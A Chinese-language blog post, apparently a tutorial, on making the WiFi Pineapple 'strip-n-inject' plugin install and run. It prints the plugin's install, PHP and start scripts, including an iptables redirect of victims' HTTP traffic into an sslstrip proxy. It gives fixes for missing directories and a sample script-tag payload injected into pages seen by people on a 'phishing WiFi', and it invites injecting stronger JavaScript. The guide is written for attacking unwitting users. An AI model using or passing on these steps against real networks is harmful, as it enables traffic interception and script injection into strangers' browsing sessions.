WIFI菠萝有一个strip-n-inject插件。可以在其他人连上钓鱼WIFI浏览网页时,在其网页源码末尾插入文字。当然包括HTML标签和Javascript代码。所以可以做到XSS攻击。
而一开始将strip-n-inject插件放到/pineapple/components/infusions/目录,打开Web页面,点Install按钮,一般是安装不成功的。
于是看了一下它的安装脚本:
/pineapple/components/infusions/strip-n-inject/includes/install.sh
#!/bin/sh
installed="0"
# install deps
opkg remove twisted-web --force-depends && opkg update && opkg install twisted-web && installed="1"
if [ ! -e "/usr/lib/python2.7/site-packages/OpenSSL" ]; then
ln -s /sd/usr/lib/python2.7/site-packages/OpenSSL /usr/lib/python2.7/site-packages/
fi
if [ ! -e "/usr/lib/python2.7/site-packages/twisted/web" ]; then
ln -s /sd/usr/lib/python2.7/site-packages/twisted/web /usr/lib/python2.7/site-packages/twisted/
fi
if [ "${installed}" == "1" ]; then
touch installed
fi
从第六行可以看出,安装时卸载了twisted-web,然后又安装了一遍twisted-web。“twisted-web”是Python的一个Web应用开发框架。而WIFI菠萝也确实存在twisted-web。所以可以直接创建”installed“文件表示已安装。
# touch /pineapple/components/infusions/strip-n-inject/includes/installed
刷新网页后就显示安装好了。
不过只是点Start还是显示”Strip-N-Inject is not running...“。
原因很简单,插件运行时执行了/pineapple/components/infusions/strip-n-inject/includes/proxy/sslstrip.py脚本,并带上”/sd/tmp/proxy_inject.log“参数。显然,”/sd/tmp/“目录并不存在。
所以,我们可以创建这个目录:
# mkdir /sd/tmp
或者我们改动插件,指向”/tmp/“目录。
涉及到保存目录的文件有两个:include/data.php、include/start.sh。
include/data.php
<?php
require("/pineapple/components/infusions/strip-n-inject/handler.php");
global $directory, $rel_dir;
require($directory."includes/vars.php");
if (isset($_GET['proxylog']))
{
if ($is_codeinject_running)
{
// get some info
$log_cmd = "touch /sd/tmp/proxy_inject.log ; tail -n 50 /sd/tmp/proxy_inject.log";
exec ($log_cmd, $output1);
foreach($output1 as $outputline1) { echo ("$outputline1\n"); }
}
else
{
echo "Strip-N-Inject is not running...";
}
}
?>
只要更改14行,去掉两个”/sd“。
include/start.sh
#!/bin/bash
# setup vars
export PATH=$PATH:/sd/usr/bin:/sd/usr/sbin
attacker_ip="$(cat proxy/attacker_ip.txt)"
# set our iptables redirect
iptables -t nat -A PREROUTING ! -s "${attacker_ip}" -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
#iptables -t nat -A PREROUTING -p tcp --destination-port 80 -j REDIRECT --to-ports 10000
# start sslstrip/inject proxy
cd proxy
python sslstrip.py -s -k -f -w /sd/tmp/proxy_inject.log 2>&1 | at now &
exit 0
同样更改倒数第三行就可以了。
然后我们Start一下。
成功了。
然后就可以开始使用了。
点”Injection Code“,然后可以在文本框中输入要注入的内容。比如JavaScript代码:
<script>alert("哈哈哈。")</script>
很简单,就是弹出写有”哈哈哈。“的对话框。
注意”Attacker IP“填好自己IP地址。当然,如果你在WIFI菠萝的父网段中也可以不设置。然后点Start
当其他人连上钓鱼WIFI并访问HTTP网页时(HTTPS没有):
当然也可以注入HTML标签:
当然远不止这样,你可以注入更牛逼的JS脚本。
如有谬误,望加指正。
转载注明出处:http://blog.youkuaiyun.com/qq_15983713/article/details/50242309